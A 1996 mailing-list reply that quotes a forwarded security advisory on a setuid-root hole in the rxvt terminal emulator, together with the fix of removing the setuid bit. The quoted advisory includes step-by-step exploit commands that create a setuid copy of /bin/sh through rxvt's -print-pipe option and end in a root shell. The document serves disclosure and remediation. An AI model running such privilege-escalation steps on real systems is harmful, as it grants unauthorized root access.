Re: [Fwd: SECURITY: rxvt security hole]
I think it's fair to release a fix with such a thing.
The fix is:
# find / -name rxvt -print
/usr/X11/bin/rxvt
/other/possible/locations/rxvt
# chmod -s /usr/X11/bin/rxvt
# chmod -s /other/possible/locations/rxvt
# ....
This will have one negative effect: if a user opens several rxvts, you
will not see him logged in more than once.
On Fri, 12 Jan 1996, Gilad Gam wrote:
> Hi,
>
> This one is a REAL alert, try it and you get root in 30 seconds...
>
> Gilad.
>
>
> David J Meltzer wrote:
> >
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > [This was recently forwarded over the linux-alert mailing list. I left
> > the full text of the exploit in this post due to the fact that it is
> > already quite well publicized. I have not verified the exploit code
> > myself. --Jeff.]
> >
> > There is a major security hole in rxvt, a terminal emulator for X, when it
> > is run on systems suid root, as is required on many configurations in order to
> > write to the utmp file. It is obvious from the code that this program was
> > not written to be run suid root; it's a pity that sysadmins that install the
> > compiled versions of this sort of code don't see the same warnings of 'run
> > suid root at your own risk' that the people that put together a distribution
> > with it that way see in the makefile.
> > The conditions that allow this particular hole to be exploited are rxvt
> > compiled with the PRINT_PIPE option and running suid root. The program
> > sets the pipe to "lpr", without a pathname, but it's even easier than that
> > to exploit because we can set the pipe to whatever we want with the -print-pipe
> > option on the rxvt command line. Although the program gives up its root
> > privileges when forking to run a shell or other command, the original program
> > continues running suid root the entire execution of the program.
> > Because the popen() call runs as root, whatever program that pipe opens
> > will execute immediately as root. In order to start the printer pipe, the
> > vt100 printer-on command is ESC[5i. The pipe can then be closed with the
> > printer-off command, ESC[4i. Exploiting this is extremely easy.
> >
> > Program: rxvt
> > Affected Operating Systems: Linux Slackware 3.0, RedHat 2.1, others with
> > rxvt suid root (and compiled with PRINT_PIPE)
> > Requirements: account on system, X server
> > Temporary Patch: chmod -s /usr/X11R6/bin/rxvt
> > Security Compromise: root
> > Author: Dave M. (davem@cmu.edu)
> > Synopsis: rxvt fails to give up root privileges before
> > opening a pipe to a program that can be specified
> > by the user.
> >
> > Exploit:
> > 1. Set DISPLAY environment variable if necessary so you can use x clients.
> > 2. In user shell:
> > $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
> > $ chmod +x /tmp/rxbug
> > $ rxvt -print-pipe /tmp/rxbug
> > 3. In rxvt xclient:
> > $ cat
> > ESC[5i
> > ESC[4i
> > (The client will close at this point with a broken pipe)
> > 4. $ /tmp/rxsh
> > # whoami
> > root
> > #
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface
> >
> > iQCVAwUBMO1fMXoDqzGe1QXFAQH+jgP+IgtZw9HYoaSd4aLd0PzSH40JSfPtHc+5
> > r3oLGMWxwTrb1f8Dx367LFNwZzvM4QAWkMQ01yjNPFh6fpgMgLPsc2atmn1AWJq+
> > ZFpNxQ6yu6/1chDtSh4XNrdJSAOKSrz6Y3T0N+23uCC2feV78eMqe+Trmq9TxCac
> > r16NALs+Zwo=
> > =BzNN
> > -----END PGP SIGNATURE-----
> >
> > ------------------------------------------------------------------------
> > The normal moderators for this newsgroup (Matt Welsh and Lars Wirzenius)
> > were bypassed for this announcement; we (Olaf Kirch and Jeff Uphoff)
> > have their implicit approval for security announcements, by prior
> > arrangement.
> > ------------------------------------------------------------------------
>
--------------------------------------------- ....- --.. ----. -.. --. .
Arik Baratz, Regularus Studentus, iNTP, 4Z9DGE
---------------------------------------------------------------------------
"Your conscious mind is very intelligent, and your unconscious mind
is a hell of a lot smarter than you are."
- Erickson H. Milton
http://ccarik.technion.ac.il/~arikb